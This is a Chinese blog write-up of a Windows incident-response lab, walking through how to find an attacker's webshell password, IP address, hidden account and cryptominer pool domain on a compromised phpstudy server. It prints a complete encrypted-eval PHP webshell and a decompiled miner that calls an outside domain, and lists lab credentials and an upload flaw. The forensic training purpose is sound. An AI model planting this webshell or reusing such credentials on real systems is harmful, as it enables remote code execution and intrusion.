windows-web1

windows-web1

挑战内容

前景需要:

小李在值守的过程中,发现有CPU占用飙升,出于胆子小,就立刻将服务器关机,并找来正在吃苕皮的hxd帮他分析,这是他的服务器系统,请你找出以下内容,并作为通关条件:

1.攻击者的shell密码

2.攻击者的IP地址

3.攻击者的隐藏账户名称

4.攻击者挖矿程序的矿池域名(仅域名)

5.有实力的可以尝试着修复漏洞

关于靶机启动

使用Vmware启动即可,如启动错误,请升级至Vmware17.5以上

靶机环境:

Windows Server 2022

phpstudy(小皮面板)

图片

题解

如何查看自己的题解是否正确?

桌面上有一个administrator用户的桌面上解题程序

图片

输入正确答案即可解题。

相关账户密码

用户:administrator

密码:Zgsf@admin.com

1.攻击者的shell密码

上传一个D盾扫一下

image-20250327002023343

成功找到shell.php

<?php
@error_reporting(0);
session_start();
    $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
	$_SESSION['k']=$key;
	session_write_close();
	$post=file_get_contents("php://input");
	if(!extension_loaded('openssl'))
	{
		$t="base64_"."decode";
		$post=$t($post."");
		
		for($i=0;$i<strlen($post);$i++) {
    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
    			}
	}
	else
	{
		$post=openssl_decrypt($post, "AES128", $key);
	}
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
	class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
?>

密码:rebeyond

image-20250327002212756

2.攻击者的IP地址

可以查找apache的日志文件

image-20250327004934418

可以确定攻击者ip地址是192.168.126.1

3.攻击者的隐藏账户名称

查看服务器是否存在可疑账号、新增账号。

直接使用D盾找到隐藏账号,也可以查看注册表

image-20250327003400032

注册表介绍

方法一:使用快捷键打开(推荐)

  1. 按下 Win + R 组合键,打开运行对话框。
  2. 输入 regedit,点击 确定 或按下回车键。
  3. 若出现用户账户控制(UAC)提示,点击 “是” 以管理员身份运行。

方法二:通过开始菜单搜索

  1. 点击任务栏搜索图标(或按下 Win + S)。
  2. 输入 “注册表编辑器”“regedit”
  3. 在搜索结果中点击 “注册表编辑器” 应用。

方法三:直接定位注册表文件

  1. 打开 此电脑,进入 C:\Windows\System32 文件夹。
  2. 找到并双击 regedit.exe(或 regedit32.exe)文件。

方法四:通过命令提示符 / PowerShell

  1. 以管理员身份打开命令提示符或 PowerShell

    • 右键点击开始菜单,选择 “命令提示符(管理员)”“Windows PowerShell(管理员)”
  2. 输入 regedit,按下回车键。

注册表界面说明

打开后,左侧为 注册表主键(以 HKEY_ 开头),常见主键包括:

  • HKEY_CLASSES_ROOT:文件类型关联和 OLE 对象设置。

  • HKEY_CURRENT_USER:当前用户的个性化设置。

  • HKEY_LOCAL_MACHINE:系统硬件和软件的全局配置。

  • HKEY_USERS:所有用户的配置文件。

  • HKEY_CURRENT_CONFIG:当前硬件配置信息。

打开注册表查看用户信息:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList

image-20250327003952981

或者

HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names

4.攻击者挖矿程序的矿池域名(仅域名)

在hack用户桌面找到

image-20250327005421890

猜测为挖矿程序

图标为python程序图标

工具:https://github.com/extremecoders-re/pyinstxtractor

image-20250327010858357

找到pyc文件

pyc反编译

python反编译 - 在线工具

#!/usr/bin/env python
# visit https://tool.lu/pyc/ for more information
# Version: Python 3.8

import multiprocessing
import requests

def cpu_intensive_task():
    
    try:
        requests.get('http://wakuang.zhigongshanfang.top', 10, **('timeout',))
    finally:
        continue
        continue

    continue

if __name__ == '__main__':
    cpu_count = multiprocessing.cpu_count()
    processes = (lambda .0: [ multiprocessing.Process(cpu_intensive_task, **('target',)) for _ in .0 ])(range(cpu_count))
    for process in processes:
        process.start()
    for process in processes:
        process.join()

找到域名:wakuang.zhigongshanfang.top

5.有实力的可以尝试着修复漏洞

弱口令:

admin:123456

任意文件上传

image-20250327083240160

上传一个shell.zip里面包含shell.php

posted @ 2025-03-27 08:34  yk1ng  阅读(136)  评论(0)    收藏  举报